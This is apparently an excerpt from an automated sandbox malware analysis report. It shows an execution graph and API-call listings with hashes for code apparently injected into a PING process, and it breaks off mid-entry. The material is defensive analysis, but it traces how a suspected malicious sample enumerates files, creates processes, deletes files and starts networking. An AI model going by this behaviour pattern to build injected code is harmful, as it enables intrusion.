                                                      execution_graph 81627 3089640 81629 308964f 81627->81629 81628 3089690 81629->81628 81630 308967d CreateThread 81629->81630 81636 3096f44 81637 3096f19 81636->81637 81638 3096f47 81636->81638 81640 3096fc2 81638->81640 81641 309ab70 81638->81641 81642 309ab96 81641->81642 81643 309adb5 81642->81643 81668 30a83f0 81642->81668 81643->81640 81645 309ac0c 81645->81643 81671 30ab100 81645->81671 81647 309ac28 81647->81643 81648 309acf9 81647->81648 81677 30a7650 81647->81677 81649 309ad18 81648->81649 81651 3095610 LdrInitializeThunk 81648->81651 81657 309ad9d 81649->81657 81689 30a7220 81649->81689 81651->81649 81653 309ac8d 81653->81643 81654 309ace1 81653->81654 81656 309acbf 81653->81656 81681 3095610 81653->81681 81685 3097ad0 81654->81685 81704 30a3800 LdrInitializeThunk 81656->81704 81659 3097ad0 LdrInitializeThunk 81657->81659 81663 309adab 81659->81663 81663->81640 81664 309ad74 81694 30a72c0 81664->81694 81666 309ad8e 81699 30a7400 81666->81699 81669 30a840d 81668->81669 81670 30a841e CreateProcessInternalW 81669->81670 81670->81645 81672 30ab070 81671->81672 81673 30ab0cd 81672->81673 81705 30a9fd0 81672->81705 81673->81647 81675 30ab0aa 81708 30a9ef0 81675->81708 81678 30a766a 81677->81678 81717 3882c0a 81678->81717 81679 309ac84 81679->81648 81679->81653 81682 309563b 81681->81682 81720 30a7820 81682->81720 81684 309564e 81684->81656 81686 3097ae3 81685->81686 81726 30a7560 81686->81726 81688 3097b0e 81688->81640 81690 30a7292 81689->81690 81692 30a7244 81689->81692 81732 38839b0 LdrInitializeThunk 81690->81732 81691 30a72b7 81691->81664 81692->81664 81695 30a7335 81694->81695 81697 30a72e7 81694->81697 81733 3884340 LdrInitializeThunk 81695->81733 81696 30a735a 81696->81666 81697->81666 81700 30a7472 81699->81700 81701 30a7424 81699->81701 81734 3882fb0 LdrInitializeThunk 81700->81734 81701->81657 81702 30a7497 81702->81657 81704->81654 81711 30a8310 81705->81711 81707 30a9feb 81707->81675 81714 30a8360 81708->81714 81710 30a9f09 81710->81673 81712 30a832a 81711->81712 81713 30a833b RtlAllocateHeap 81712->81713 81713->81707 81715 30a837a 81714->81715 81716 30a838b RtlFreeHeap 81715->81716 81716->81710 81718 3882c1f LdrInitializeThunk 81717->81718 81719 3882c11 81717->81719 81718->81679 81719->81679 81721 30a78c2 81720->81721 81723 30a7844 81720->81723 81725 3882d10 LdrInitializeThunk 81721->81725 81722 30a7907 81722->81684 81723->81684 81725->81722 81727 30a75d3 81726->81727 81728 30a7584 81726->81728 81731 3882dd0 LdrInitializeThunk 81727->81731 81728->81688 81729 30a75f8 81729->81688 81731->81729 81732->81691 81733->81696 81734->81702 81735 309265e 81738 3095f00 81735->81738 81737 30926a3 81739 3095f33 81738->81739 81740 3095f57 81739->81740 81745 30a7b70 81739->81745 81740->81737 81742 3095f7a 81742->81740 81749 30a8000 81742->81749 81744 3095ffc 81744->81737 81746 30a7b8a 81745->81746 81752 3882ca0 LdrInitializeThunk 81746->81752 81747 30a7bb6 81747->81742 81750 30a801a 81749->81750 81751 30a802b NtClose 81750->81751 81751->81744 81752->81747 81753 3882ad0 LdrInitializeThunk 81754 309f7d0 81755 309f7ed 81754->81755 81758 30943e0 81755->81758 81757 309f80b 81759 3094404 81758->81759 81760 3094440 LdrLoadDll 81759->81760 81761 309440b 81759->81761 81760->81761 81761->81757 81762 309be10 81763 309be39 81762->81763 81764 309bf3d 81763->81764 81765 309bee3 FindFirstFileW 81763->81765 81765->81764 81767 309befe 81765->81767 81766 309bf24 FindNextFileW 81766->81767 81768 309bf36 FindClose 81766->81768 81767->81766 81768->81764 81774 30a7d10 81775 30a7dbf 81774->81775 81777 30a7d3b 81774->81777 81776 30a7dd5 NtCreateFile 81775->81776 81778 3095713 81779 3095719 81778->81779 81780 309571c 81778->81780 81779->81780 81781 30956a8 81779->81781 81782 30a7650 LdrInitializeThunk 81780->81782 81783 3097ad0 LdrInitializeThunk 81781->81783 81784 3095756 81782->81784 81785 30956c0 81783->81785 81787 30956ec 81785->81787 81788 3097a50 81785->81788 81789 3097a94 81788->81789 81790 3097ab5 81789->81790 81795 30a7360 81789->81795 81790->81785 81792 3097aa5 81793 3097ac1 81792->81793 81794 30a8000 NtClose 81792->81794 81793->81785 81794->81790 81796 30a73d2 81795->81796 81797 30a7384 81795->81797 81800 3884650 LdrInitializeThunk 81796->81800 81797->81792 81798 30a73f7 81798->81792 81800->81798 81801 30a0dd0 81802 30a0dec 81801->81802 81803 30a0e28 81802->81803 81804 30a0e14 81802->81804 81805 30a8000 NtClose 81803->81805 81806 30a8000 NtClose 81804->81806 81807 30a0e31 81805->81807 81808 30a0e1d 81806->81808 81811 30aa010 RtlAllocateHeap 81807->81811 81810 30a0e3c 81811->81810 81812 30a0951 81813 30a095d 81812->81813 81825 30a7e70 81813->81825 81815 30a0972 81816 30a0990 81815->81816 81817 30a09a5 81815->81817 81819 30a8000 NtClose 81816->81819 81818 30a8000 NtClose 81817->81818 81822 30a09ae 81818->81822 81820 30a0999 81819->81820 81821 30a09da 81822->81821 81823 30a9ef0 RtlFreeHeap 81822->81823 81824 30a09ce 81823->81824 81826 30a7f0c 81825->81826 81828 30a7e94 81825->81828 81827 30a7f22 NtReadFile 81826->81827 81827->81815 81828->81815 81829 30a0c6a 81830 30a0c75 81829->81830 81831 30a0cff 81830->81831 81833 30a0c8b 81830->81833 81832 30a8000 NtClose 81831->81832 81834 30a0d15 81832->81834 81837 30a7e10 81833->81837 81838 30a7e2d 81837->81838 81841 3882af0 LdrInitializeThunk 81838->81841 81839 30a0cb6 81841->81839 81842 30981ae 81843 30981b3 81842->81843 81845 3098172 81843->81845 81846 3096bd0 LdrInitializeThunk LdrInitializeThunk 81843->81846 81846->81845 81849 30896a0 81851 3089ba2 81849->81851 81850 308a184 81851->81850 81853 30a9b80 81851->81853 81854 30a9ba6 81853->81854 81859 3083f50 81854->81859 81856 30a9bb2 81858 30a9be0 81856->81858 81862 30a45f0 81856->81862 81858->81850 81866 3093110 81859->81866 81861 3083f5d 81861->81856 81863 30a464a 81862->81863 81864 30a4657 81863->81864 81877 30915b0 81863->81877 81864->81858 81867 3093127 81866->81867 81869 3093140 81867->81869 81870 30a8a50 81867->81870 81869->81861 81872 30a8a68 81870->81872 81871 30a8a8c 81871->81869 81872->81871 81873 30a7650 LdrInitializeThunk 81872->81873 81874 30a8ae1 81873->81874 81875 30a9ef0 RtlFreeHeap 81874->81875 81876 30a8afa 81875->81876 81876->81869 81878 30915eb 81877->81878 81895 3097860 81878->81895 81880 30915f3 81881 30918b5 81880->81881 81882 30a9fd0 RtlAllocateHeap 81880->81882 81881->81864 81883 3091609 81882->81883 81884 30a9fd0 RtlAllocateHeap 81883->81884 81885 309161a 81884->81885 81886 30a9fd0 RtlAllocateHeap 81885->81886 81887 309162b 81886->81887 81891 30916b3 81887->81891 81910 3096660 NtClose LdrInitializeThunk LdrInitializeThunk 81887->81910 81889 30943e0 LdrLoadDll 81890 3091872 81889->81890 81892 30918af 81890->81892 81893 30918a1 WSAStartup 81890->81893 81891->81889 81906 30a6d10 81892->81906 81893->81892 81896 309788c 81895->81896 81911 3097750 81896->81911 81899 30978d1 81902 30a8000 NtClose 81899->81902 81903 30978ed 81899->81903 81900 30978b9 81901 30978c4 81900->81901 81904 30a8000 NtClose 81900->81904 81901->81880 81905 30978e3 81902->81905 81903->81880 81904->81901 81905->81880 81907 30a6d6a 81906->81907 81909 30a6d77 81907->81909 81922 30918d0 81907->81922 81909->81881 81910->81891 81912 3097846 81911->81912 81913 309776a 81911->81913 81912->81899 81912->81900 81917 30a76f0 81913->81917 81916 30a8000 NtClose 81916->81912 81918 30a770a 81917->81918 81921 38835c0 LdrInitializeThunk 81918->81921 81919 309783a 81919->81916 81921->81919 81924 30918f0 81922->81924 81936 3097b30 81922->81936 81929 3091dd8 81924->81929 81940 30aafd0 81924->81940 81926 3091af1 81927 30ab100 2 API calls 81926->81927 81930 3091b06 81927->81930 81928 3097ad0 LdrInitializeThunk 81932 3091b31 81928->81932 81929->81909 81930->81932 81945 3090570 81930->81945 81932->81928 81932->81929 81933 3090570 LdrInitializeThunk 81932->81933 81933->81932 81934 3091c5f 81934->81932 81935 3097ad0 LdrInitializeThunk 81934->81935 81935->81934 81937 3097b3d 81936->81937 81938 3097b5e SetErrorMode 81937->81938 81939 3097b65 81937->81939 81938->81939 81939->81924 81941 30aafe0 81940->81941 81942 30aafe6 81940->81942 81941->81926 81943 30a9fd0 RtlAllocateHeap 81942->81943 81944 30ab00c 81943->81944 81944->81926 81948 30a8280 81945->81948 81949 30a829a 81948->81949 81952 3882c70 LdrInitializeThunk 81949->81952 81950 3090592 81950->81934 81952->81950 81953 3095720 81954 3095736 81953->81954 81955 30a7650 LdrInitializeThunk 81954->81955 81956 3095756 81955->81956 81957 30a1160 81958 30a116f 81957->81958 81959 30a11b3 81958->81959 81962 30a11f1 81958->81962 81964 30a11f6 81958->81964 81960 30a9ef0 RtlFreeHeap 81959->81960 81961 30a11c3 81960->81961 81963 30a9ef0 RtlFreeHeap 81962->81963 81963->81964 81965 30a7f60 81966 30a7fcc 81965->81966 81967 30a7f84 81965->81967 81968 30a7fe2 NtDeleteFile 81966->81968 81969 30a74a0 81970 30a7527 81969->81970 81971 30a74c7 81969->81971 81974 3882ee0 LdrInitializeThunk 81970->81974 81972 30a7558 81974->81972 81975 3092ffc 81976 3097750 2 API calls 81975->81976 81977 309300c 81976->81977 81978 30a8000 NtClose 81977->81978 81979 3093021 81977->81979 81978->81979 81980 30995b0 81981 30995b7 81980->81981 81981->81980 81982 30a9ef0 RtlFreeHeap 81981->81982 81983 30995d8 81981->81983 81982->81983 81984 30969b0 81985 30969da 81984->81985 81988 3097900 81985->81988 81987 3096a04 81989 309791d 81988->81989 81995 30a7740 81989->81995 81991 309796d 81992 3097974 81991->81992 81993 30a7820 LdrInitializeThunk 81991->81993 81992->81987 81994 309799d 81993->81994 81994->81987 81996 30a77d3 81995->81996 81998 30a7767 81995->81998 82000 3882f30 LdrInitializeThunk 81996->82000 81997 30a780c 81997->81991 81998->81991 82000->81997 82001 309a670 82006 309a3a0 82001->82006 82003 309a67d 82020 309a040 82003->82020 82005 309a699 82007 309a3c5 82006->82007 82008 309a502 82007->82008 82031 30a2420 82007->82031 82008->82003 82010 309a519 82010->82003 82012 309a510 82012->82010 82015 309a601 82012->82015 82042 30a3eb0 82012->82042 82047 3099aa0 82012->82047 82014 30a3eb0 GetFileAttributesW 82014->82015 82015->82014 82017 309a659 82015->82017 82056 3099e00 82015->82056 82018 30a9ef0 RtlFreeHeap 82017->82018 82019 309a660 82018->82019 82019->82003 82021 309a056 82020->82021 82024 309a061 82020->82024 82022 30a9fd0 RtlAllocateHeap 82021->82022 82022->82024 82023 309a077 82023->82005 82024->82023 82025 309a36e 82024->82025 82028 30a3eb0 GetFileAttributesW 82024->82028 82029 3099aa0 RtlFreeHeap 82024->82029 82030 3099e00 RtlFreeHeap 82024->82030 82026 309a387 82025->82026 82027 30a9ef0 RtlFreeHeap 82025->82027 82026->82005 82027->82026 82028->82024 82029->82024 82030->82024 82032 30a242e 82031->82032 82033 30a2435 82031->82033 82032->82012 82034 30943e0 LdrLoadDll 82033->82034 82035 30a246a 82034->82035 82036 30a2479 82035->82036 82060 30a1ef0 LdrLoadDll 82035->82060 82038 30a9fd0 RtlAllocateHeap 82036->82038 82040 30a2614 82036->82040 82041 30a2492 82038->82041 82039 30a9ef0 RtlFreeHeap 82039->82040 82040->82012 82041->82039 82041->82040 82043 30a3f0d 82042->82043 82044 30a3f44 82043->82044 82061 3097d70 82043->82061 82044->82012 82046 30a3f26 82046->82012 82048 3099ac6 82047->82048 82065 309d2e0 82048->82065 82050 3099b2d 82051 3099b4b 82050->82051 82052 3099caf 82050->82052 82053 3099c94 82051->82053 82069 3099960 82051->82069 82052->82053 82054 3099960 RtlFreeHeap 82052->82054 82053->82012 82054->82052 82057 3099e26 82056->82057 82058 309d2e0 RtlFreeHeap 82057->82058 82059 3099ea2 82058->82059 82059->82015 82060->82036 82063 3097d21 82061->82063 82062 3097d48 GetFileAttributesW 82062->82063 82063->82046 82063->82061 82063->82062 82064 3097d57 82063->82064 82064->82046 82066 309d2f6 82065->82066 82066->82050 82067 30a9ef0 RtlFreeHeap 82066->82067 82068 309d33c 82067->82068 82068->82050 82070 3099976 82069->82070 82073 309d350 82070->82073 82072 3099a7c 82072->82051 82074 309d374 82073->82074 82075 309d40c 82074->82075 82076 30a9ef0 RtlFreeHeap 82074->82076 82075->82072 82076->82075 82077 3090a70 82078 3090a89 82077->82078 82079 30943e0 LdrLoadDll 82078->82079 82080 3090aa7 82079->82080 82081 3090af3 82080->82081 82082 3090ae0 PostThreadMessageW 82080->82082 82082->82081 82083 309eef0 82084 309ef54 82083->82084 82085 3095f00 2 API calls 82084->82085 82087 309f07d 82085->82087 82086 309f084 82087->82086 82108 3096010 82087->82108 82089 309f223 82090 309f100 82090->82089 82091 309f232 82090->82091 82112 309ecd0 82090->82112 82092 30a8000 NtClose 82091->82092 82095 309f23c 82092->82095 82094 309f135 82094->82091 82096 309f140 82094->82096 82097 30a9fd0 RtlAllocateHeap 82096->82097 82098 309f169 82097->82098 82099 309f188 82098->82099 82100 309f172 82098->82100 82121 309ebc0 CoInitialize 82099->82121 82101 30a8000 NtClose 82100->82101 82103 309f17c 82101->82103 82104 309f196 82105 30a8000 NtClose 82104->82105 82106 309f21c 82105->82106 82107 30a9ef0 RtlFreeHeap 82106->82107 82107->82089 82109 3096035 82108->82109 82123 30a7960 82109->82123 82113 309ecec 82112->82113 82114 30943e0 LdrLoadDll 82113->82114 82116 309ed0a 82114->82116 82115 309ed13 82115->82094 82116->82115 82117 30943e0 LdrLoadDll 82116->82117 82118 309edde 82117->82118 82119 30943e0 LdrLoadDll 82118->82119 82120 309ee3b 82118->82120 82119->82120 82120->82094 82122 309ec25 82121->82122 82122->82104 82124 30a797a 82123->82124 82127 3882c60 LdrInitializeThunk 82124->82127 82125 30960a9 82125->82090 82127->82125 82128 30a4fb0 82129 30a500a 82128->82129 82131 30a5017 82129->82131 82132 30a2b40 82129->82132 82134 30a2b81 82132->82134 82133 30a2c86 82133->82131 82134->82133 82135 30943e0 LdrLoadDll 82134->82135 82137 30a2bc7 82135->82137 82136 30a2c00 Sleep 82136->82137 82137->82133 82137->82136

                                                      Executed Functions

                                                      Function 0309BE10 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0309BEF4
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0309BF2F
                                                      • FindClose.KERNELBASE(?), ref: 0309BF3A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: bd9c2be3583d3bf749113f70bf2a133959825a791ae526caeccdbd2650c201ba
                                                      • Instruction ID: b9707290edade07cac262183c3a86d9f539d830b4cf900b4c7fe6cb5bd0a054c
                                                      • Opcode Fuzzy Hash: bd9c2be3583d3bf749113f70bf2a133959825a791ae526caeccdbd2650c201ba
                                                      • Instruction Fuzzy Hash: A731B475501348BBEB60EFA4DC84FFF77BCEF84754F144459B948AB180DA70AA849BA0
                                                      Function 030A7D10 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030A7E06
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c68e728ad39377c440db94a4305d40df19ea38251ebc9d98e5bffa51801b772c
                                                      • Instruction ID: 66b12d6a1b347697b50316aacfdcca512707bd5a8cededdce58ff304380df42a
                                                      • Opcode Fuzzy Hash: c68e728ad39377c440db94a4305d40df19ea38251ebc9d98e5bffa51801b772c
                                                      • Instruction Fuzzy Hash: 0C31C0B5A01609AFCB14DF98D880EEFB7F9AF8C314F108219F918A7340D770A951CBA5
                                                      Function 030A7E70 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030A7F4B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1465728481726c9bb084e5323f0b8c86563e54366064e15e4f0de43792759f49
                                                      • Instruction ID: 7f2480f62ad55309f24c8f7fabcfa42bd0ef2ae6ba1708cabd3790689f8651f2
                                                      • Opcode Fuzzy Hash: 1465728481726c9bb084e5323f0b8c86563e54366064e15e4f0de43792759f49
                                                      • Instruction Fuzzy Hash: 4B31D1B5A01609AFCB14DF98D880EEAB7B9EF8C314F148209F918A7240D771A911CBA5
                                                      Function 030A7F60 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 854604fafdd28f89a9129c512f9f3f7df6f50225bcbb5afc650f1508cc539b29
                                                      • Instruction ID: 800ad0329fc4d259c7d25f19708c4bf2d2c3e89819f9c49e4f6ecf2135744ce2
                                                      • Opcode Fuzzy Hash: 854604fafdd28f89a9129c512f9f3f7df6f50225bcbb5afc650f1508cc539b29
                                                      • Instruction Fuzzy Hash: EF015E36A427087FD614EAA8DC41FEB77ACDF85710F444409FA58AB280D7717910C7E5
                                                      Function 030A8000 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030A8034
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction ID: a8333f2c1f5a66a75600c753b9259baf14186fe1743cd9d799df56a88301634b
                                                      • Opcode Fuzzy Hash: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction Fuzzy Hash: D8E04F356407147BD210EB59DC40FDB776CDFC5760F008415FA0CAB241C671791186F4
                                                      Function 03884340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                      • Instruction ID: 19e5261c85b1486048b72f5b89aa785ad2cd13cca9127b93551e36e6c1d2ec4d
                                                      • Opcode Fuzzy Hash: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                      • Instruction Fuzzy Hash: 5B90023160580516A540B1984C84546404597E1301B69C052E142C554C8B148A5A5366
                                                      Function 03884650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                      • Instruction ID: 68dcae721359c8d42365ee171a57110785b7b8c885c5f8566701410145e8a8ce
                                                      • Opcode Fuzzy Hash: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                      • Instruction Fuzzy Hash: 53900261601505465540B1984C04406604597E23013A9C156A155C560C87188959926E
                                                      Function 038835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0f72b877df92c334950a766a7d2b586098a00bd2818bca801d1b7b0e23eea65e
                                                      • Instruction ID: baa79bc5b7c5770eb664656ea98c7fec717879cf6c717446465393485ae928d8
                                                      • Opcode Fuzzy Hash: 0f72b877df92c334950a766a7d2b586098a00bd2818bca801d1b7b0e23eea65e
                                                      • Instruction Fuzzy Hash: CE90023160550906E500B1984914706104587D1201F79C452A142C568D87958A5565A7
                                                      Function 03882B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                      • Instruction ID: b3e4fffde6fe7b85938b00e2acfb43f89456ebaaa423749f4c3747a901bcb5a8
                                                      • Opcode Fuzzy Hash: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                      • Instruction Fuzzy Hash: 68900261202405075505B1984814616404A87E1201B69C062E201C590DC6258995612A
                                                      Function 03882AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                      • Instruction ID: 2bb7818f778170ea65a4c91ab18bdecd34d9e9fb78ebf7c8f704f60232c07261
                                                      • Opcode Fuzzy Hash: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                      • Instruction Fuzzy Hash: C5900225211405071505F5980B04507008687D6351369C062F201D550CD72189655126
                                                      Function 03882AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
                                                      • Instruction ID: 1dc2a3e11e818c6d3e8fa83d7cff075e60942350a2877ae9e8db76c750e66116
                                                      • Opcode Fuzzy Hash: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
                                                      • Instruction Fuzzy Hash: 7E900225221405061545F5980A0450B048597D73513A9C056F241E590CC72189695326
                                                      Function 038839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3168f0e86fbb8659e062615fc6995fb56b4080fff3845c9f9200fa7b48118cb4
                                                      • Instruction ID: a0e5d43cfc192d0dd3dfd40b9db4986f3a152a79605ddc073c0d0e43e46e4548
                                                      • Opcode Fuzzy Hash: 3168f0e86fbb8659e062615fc6995fb56b4080fff3845c9f9200fa7b48118cb4
                                                      • Instruction Fuzzy Hash: 5890022124545606E550B19C48046164045A7E1201F69C062A181C594D865589596226
                                                      Function 03882FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
